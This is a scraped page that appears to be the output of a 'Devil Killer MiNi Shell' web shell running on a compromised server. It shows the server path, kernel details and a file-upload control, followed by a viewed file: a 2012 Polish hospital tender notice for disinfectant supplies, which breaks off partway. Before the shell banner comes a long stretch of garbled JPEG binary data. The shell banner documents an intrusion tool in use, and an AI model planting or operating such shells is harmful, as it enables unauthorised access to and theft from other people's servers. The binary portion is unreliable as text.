JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120509/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120509/146490-N-2012.html

<p class="kh_header"><b>Bydgoszcz: sukcesywne dostawy środków dezynfekcyjnych</b><br>
<b>Numer ogłoszenia: 146490 - 2012; data zamieszczenia: 09.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wielospecjalistyczny Szpital Miejski im. dr Emila Warmińskiego Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Szpitalna 19, 85-826 Bydgoszcz, woj. kujawsko-pomorskie, tel. 52 3709124, faks 52 3709125.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital.bydgoszcz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> sukcesywne dostawy środków dezynfekcyjnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> sukcesywne dostawy środków dezynfekcyjnych , podział na 21 grup.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 21.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 4.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony jeżeli Wykonawca posiada uprawnienia do wykonywania dostaw objętych przedmiotem zamówienia, jeżeli przepisy prawa nakładają obowiązek ich posiadania. W celu potwierdzenia powyższego  Wykonawca  złoży: 
a/ oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące Zał. nr 3 do SIWZ
( W przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymienione  oświadczenie odrębnie lub składają  jedno oświadczenie  podpisane przez pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca  posiada niezbędną wiedzę i doświadczenie do wykonania zamówienie  w zakresie dostaw towarów stanowiących przedmiot zamówienia . tzn. wykaże się w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy - w tym okresie wykonaniem min. 1 dostawy  środków dezynfekcyjnych i lub środków czystości  ( jakichkolwiek  )  na kwotę min:
w grupie 1 : 6231 zł brutto 
w grupie 2:  1581 zł brutto 
w grupie 3:  543 zł brutto 
w grupie 4:  1478zł brutto 
w grupie 5:  7047zł brutto 
w grupie 6:  1636 zł brutto 
w grupie 7:  7107 zł brutto 
w grupie 8:  1719zł brutto 
w grupie 9:  2079  zł brutto 
w grupie 10  : 851 zł brutto 
w grupie 11 :  2119 zł brutto 
w grupie 12:  510 zł brutto 
w grupie 13:  157 zł brutto 
w grupie 14:   6832 zł brutto 
w grupie 15:  3100 zł brutto 
w grupie 16:  2664 zł brutto 
w grupie 17:  1025 zł brutto 
w grupie 18:  688 zł brutto 
w grupie 19:  253  zł brutto 
w grupie 20 : 605 zł brutto 
w grupie 21 :  494 zł brutto 

Jeżeli Wykonawca składa ofertę na grupę  np. nr 1 i 2 zobowiązany jest wykazać się wykonaniem min. 1 dostawy   środków dezynfekcyjnych  i lub środków czystości ( jakichkolwiek)    na kwotę min.    7812 zł brutto , jeżeli Wykonawca składa  ofertę na wszystkie grupy, zobowiązany jest wówczas wykazać się wykonaniem min. 1 dostawy  j.w   na kwotę min  48719  zł brutto .

(W przypadku składania oferty wspólnej, przedmiotowy warunek Wykonawcy musi spełniać co najmniej jeden z Wykonawców ).
Pod pojęciem  dostawy  Zamawiający rozumie  łączną wartość zawartej na dany okres  umowy lub też wartość jednostkową  pojedynczej dostawy. 

W celu wykazania spełniana powyższego warunku udziału w postępowaniu, Wykonawca zobowiązany jest dołączyć do oferty : 

a/ Wykaz wykonanych dostaw, w tym min. 1 dostawy na potwierdzenie spełniania warunku określonego wyżej , w okresie ostatnich  trzech lat przed upływem terminu składania ofert , a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie , z podaniem ich wartości, przedmiotu, dat wykonania, oraz załączeniem dokumentu potwierdzającego, że dostawy te zostały wykonane należycie, zgodnie ze wzorem stanowiącym Zał. nr 6 do SIWZ. 
(W przypadku składania oferty wspólnej, wykaz składa ten z Wykonawców, który potwierdza jego spełnianie)
b/ oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące Zał. Nr 3 do SIWZ 
( W przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymienione oświadczenie odrębnie lub składają  jedno  oświadczenie  podpisane  przez pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia).

Wykonawca może polegać na wiedzy i doświadczeniu  innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia , w szczególności przedstawiając w tym celu  pisemne zobowiązanie  tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia ( wówczas należy powyższe  załączyć do oferty ) .</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.  Zamawiający uzna warunek za spełniony jeżeli Wykonawca dysponuje odpowiednim potencjałem technicznym do wykonania zamówienia w zakresie dostaw towarów stanowiących przedmiot zamówienia. W tym celu Wykonawca złoży : 
a/ oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące Zał. nr 3 do SIWZ. 
( W przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymienione oświadczenie odrębnie lub składają jedno  oświadczenie  podpisane  przez pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.  Zamawiający uzna warunek za spełniony jeżeli Wykonawca dysponuje osobami zdolnymi do wykonania zamówienia w zakresie dostaw towarów stanowiących przedmiot zamówienia. W tym celu Wykonawca złoży : 
a/ oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące Zał. nr 3 do SIWZ. 
( W przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymienione oświadczenie odrębnie lub składają jedno  oświadczenie  podpisane  przez pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie. Zamawiający uzna warunek za spełniony jeżeli Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia. W celu wykazania spełniana powyższego warunku udziału w postępowaniu, Wykonawca zobowiązany jest dołączyć do oferty :
a/ oświadczenie o spełnianiu warunków udziału w postępowaniu, stanowiące Zał. Nr 3 do SIWZ( W przypadku oferty składanej wspólnie przez kilku wykonawców, każdy wykonawca składa wyżej wymienione oświadczenie odrębnie lub składają  jedno  oświadczenie  podpisane  przez pełnomocnika Wykonawców wspólnie ubiegających się o udzielenie zamówienia).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1.Certyfikat CE/ deklaracja zgodności CE  lub wpis/zgłoszenie/powiadomienie do Rejestru Produktów leczniczych, wyrobów medycznych i produktów biobójczych (Dz.U. 2010, nr 107, poz. 679)- dotyczy grupy  :7 , 8, 9, 13, 14, 15, 16, 17, 18, 19, 20, 21.
2.Aktualne pozwolenie MZ na dopuszczenie produktu leczniczego do obrotu na terenie RP lub świadectwo rejestracji produktu leczniczego; charakterystyka produktu leczniczego zatwierdzona przez MZ lub ulotka produktu leczniczego (Dz.U. 2001, nr. 126, poz. 1382)- dotyczy  gr 1 pkt. B, gr 2 pkt. B, gr  5.
3.Pozwolenie MZ na obrót preparatami biobójczymi (Dz.U. 2002, nr. 175, poz. 1433, Dz.U. 2003, nr 16 , poz. 50) dotyczy grupy: 1 pkt. B, gr 2 pkt. B, gr 3 B, gr 4,  gr 6, gr 7, gr 8, gr 9, gr 10, gr 11, gr 12, gr 13, gr 20
4. Aktualne karty charakterystyki i aktualizowane w trakcie trwania umowy potwierdzone przez producenta lub autoryzowanego dystrybutora (REACH1907/2006/WE)- dotyczy grupy : 1 pkt. B, 2 pkt. B, 3 pkt. B, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21.
5.Dokumenty potwierdzające działanie bójcze preparatów zgodnie z Normami Europejskimi lub/i Normami Polskimi co najmniej II fazy dotyczące obszaru medycznego. W przypadku braku stosownych dokumentów potwierdzających, iż preparat spełnia Normy Europejskie i/lub Normy Polskie dopuszcza się alternatywne badania zaakceptowane przez Prezesa URPLWMiPB np. badania PZH lub wyniki badań wykonywane przez akredytowane laboratoria z krajów UE- dotyczy grupy: 7, 8, 9, 10, 11, 12, 13, 14 pkt. C, 16 pkt. B.
6. potwierdzenie działania bójczego z przeznaczeniem do obszaru spożywczego- dotyczy grupy 9 
7. Oświadczenie producenta kontenerów, iż preparat dopuszczony jest do maszynowego mycia kontenerów PRIME LINE- dotyczy grupy 21 .
8. Materiały prezentujące oferowane preparaty (prospekty, opisy, ulotki) - dotyczy wszystkich grup 
9. Dokument potwierdzający zgłoszenie do Krajowego systemu informowania o kosmetykach wprowadzonych do obrotu - dotyczy grupy: 1 A, 1 C, 2 A, 2 C, 3 A.
10. partia próbna oferowanego przedmiotu zamówienia , w najmniejszych  oryginalnych opakowaniach handlowych - dotyczy wszystkich poza 5, 12, 19</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia w rozumieniu art. 23 ust. 1  ustawy PZP.
Wtedy zobowiązani są załączyć do oferty dokument (pismo, oświadczenie) wskazujący ustanowionego pełnomocnika do reprezentowania Wykonawcy w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (dotyczy również spółek cywilnych utworzonych przez osoby fizyczne - zamiast tego dokumentu może być załączona umowa spółki cywilnej, uchwała wspólników ). 
2. Zamawiający żąda aby Wykonawca do oferty dołączył dokument lub dokumenty, z których będzie wynikać uprawnienie do podpisania oferty tj. np. aktualny odpis z właściwego rejestru, aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, aktualny statut spółki, aktualny rejestr handlowy itp. wymagane dokumenty można złożyć w formie kopii poświadczonej za zgodność z oryginałem przez Wykonawcę  . Jeżeli uprawnienie do reprezentacji osoby podpisującej  ofertę nie wynika z załączonego dokumentu o którym mowa w zdaniu poprzedzającym, do oferty  należy załączyć także pełnomocnictwo w  oryginale lub w formie kopii poświadczonej notarialnie za zgodność  z oryginałem .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający, zgodnie z art. 144 ustawy Prawo Zamówień Publicznych przewiduje możliwość zmiany postanowień  umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w następującym zakresie:
a)	producenta i nazwy handlowej  oferowanego towaru pod warunkiem zachowania tego samego przeznaczenia, parametrów technicznych, funkcjonalnych - w przypadku braku dostępności danego towaru,
b)	wielkości opakowania handlowego , w przypadkach, w których nie można było przewidzieć w chwili zawierania umowy, z odpowiednim przeliczeniem jego ceny z zachowaniem zasady proporcjonalności w stosunku  do ceny umownej 
c)	obniżenia cen jednostkowych określonych w załączniku nr 1, w przypadkach, których nie można było przewidzieć w chwili zawierania umowy,
d)	zmiany cen jednostkowych brutto na skutek zmiany ustawowej stawki podatku VAT,
e)	osób upoważnionych, o których mowa w § 6 umowy w przypadku rozwiązania stosunku pracy z osobą upoważnioną do współpracy na podstawie niniejszej umowy, a także zmian organizacyjnych w strukturze kadrowej Zamawiającego lub Wykonawcy;
f)	terminu obowiązywania umowy - w przypadku nie zamówienia przez Zamawiającego towaru w ilości podanej w ofercie w okresie obowiązywania umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.szpital.bydgoszcz.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wielospecjalistyczny Szpital Miejski im. dr E. Warmińskiego SPZOZ w Bydgoszczy , ul. Szpitalna 19, 85-826 Bydgoszcz , ul. Szpitalna 19 , budynek administracji , pokój nr 9- zamówienia publiczne ..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.05.2012 godzina 10:00, miejsce: Wielospecjalistyczny Szpital Miejski im. dr E. Warmińskiego SPZOZ w Bydgoszczy , ul. Szpitalna 19, 85-826 Bydgoszcz , ul. Szpitalna 19 , budynek administracji , kancelaria ( sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Preparaty do chirurgicznego mycia, dezynfekcji rąk i do pielęgnacji rąk  ,preparaty do chirurgicznej dezynfekcji rąk  , preparaty do pielęgnacji po zabiegach mycia i dezynfekcji rąk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparaty do chirurgicznego mycia, dezynfekcji rąk i do pielęgnacji rąk  ,preparaty do chirurgicznej dezynfekcji rąk  , preparaty do pielęgnacji po zabiegach mycia i dezynfekcji rąk , grupa zawiera 5 pozycji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Preparat do higienicznego i chirurgicznego mycia rąk w systemie zamkniętym , preparaty do higienicznej i chirurgicznej dezynfekcji rąk w systemie zamkniętym, Preparaty do pielęgnacji po zabiegach mycia i dezynfekcji rąk w systemie zamkniętym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparat do higienicznego i chirurgicznego mycia rąk w systemie zamkniętym , preparaty do higienicznej i chirurgicznej dezynfekcji rąk w systemie zamkniętym, Preparaty do pielęgnacji po zabiegach mycia i dezynfekcji rąk w systemie zamkniętym, grupa zawiera 3 pozycje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Preparaty do mycia noworodków (wcześniaków i przenoszonych, Preparaty do mycia pacjentów z MRSA ,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparaty do mycia noworodków (wcześniaków i przenoszonych, Preparaty do mycia pacjentów z MRSA , grupa zawiera 2 pozycje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Preparaty do dezynfekcji skóry barwione , preparaty do dezynfekcji skóry - bezbarwne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparaty do dezynfekcji skóry barwione , preparaty do dezynfekcji skóry - bezbarwne , grupa zawiera 3 pozycje.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. ocena jakościowa - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Preparaty do dezynfekcji ran i błon śluzowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparaty do dezynfekcji ran i błon śluzowych, grupa zawiera 1 pozycję.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Preparaty do dezynfekcji błon śluzowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Preparaty do dezynfekcji błon śluzowych, grupa zawiera 1 pozycję.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.63.16.00-8.</p></li>
